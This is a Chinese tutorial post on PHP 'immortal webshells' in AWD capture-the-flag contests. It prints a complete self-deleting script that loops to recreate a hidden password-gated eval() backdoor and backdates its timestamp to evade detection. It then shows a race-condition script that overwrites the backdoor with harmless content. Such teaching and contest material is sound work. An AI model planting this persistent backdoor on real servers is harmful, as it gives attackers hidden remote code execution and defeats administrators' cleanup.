一个简单的不死马如:
<?php ignore_user_abort(true); set_time_limit(0); unlink(__FILE__); $file = '.3.php'; $code = '<?php if(md5($_GET["pass"])=="1a1dc91c907325c69271ddf0c944bc72"){@eval($_POST[a]);} ?>'; //pass=pass while (1){ file_put_contents($file,$code); system('touch -m -d "2018-12-01 09:10:12" .3.php'); usleep(5000); } ?>
在AWD比赛中,不死马对于维持权限十分有效。将该php文件上传到服务器,然后进行访问,会在该路径下循环生成名字为 .3.php 的不死马隐藏文件,菜刀链接:
简单解释一下PHP不死马代码:
ignore_user_abort(true);
设置与客户机断开是否会终止脚本的执行,这里设置为true则忽略与用户的断开,即使与客户机断开脚本仍会执行。
set_time_limit(0);
设置脚本最大执行时间,这里设置为0,即没有时间方面的限制
unlink(__FILE__);
删除文件本身,以起到隐蔽自身的作用
while (1){ file_put_contents($file,$code); system('touch -m -d "2018-12-01 09:10:12" .3.php'); usleep(5000); }
while循环中每隔usleep(5000)即写新的后门文件,system命令用于修改文件的创建时间或修改时间,因为在AWD比赛中有的队伍使用
find *.php -mmin -10
检查十分钟内被修改过的php文件,所以我们修改文件日期稍微进行掩饰。
最后校验是为了防止自家木马被其他人利用 (乌鸦坐飞机
<?php if(md5($_GET["pass"])=="1a1dc91c907325c69271ddf0c944bc72"){ @eval($_POST[a]); } ?>
对于不死马,直接删除脚本是没有用的,因为php执行的时候已经把脚本读进去解释成opcode运行了,关于opcode有:
https://www.laruence.com/2008/06/18/221.html
个人感觉是内存或者缓冲一类的东西趴。
这里使用条件竞争写入同名文件进行克制不死马。
可以看到现在的 .3.php 文件内容仍为:
我们上传一个写 .3.php 的php文件,注意usleep需要比不死马小,$code修改为无害内容
<?php ignore_user_abort(true); set_time_limit(0); unlink(__FILE__); $file = '.3.php'; $code = 'hi springbird !'; //pass=pass while (1){ file_put_contents($file,$code); system('touch -m -d "2018-12-01 09:10:12" .3.php'); // usleep(5000); usleep(1000); } ?>
注意红框
上传至服务器并访问
再次查看 .3.php 文件内容
可以看到内容已无害
参考链接:
https://www.jianshu.com/p/3cd8cc491b54
https://www.laruence.com/2008/06/18/221.html
http://123.207.99.2/2019/08/28/php%E4%B8%8D%E6%AD%BB%E9%A9%AC%E6%B5%85%E6%9E%90/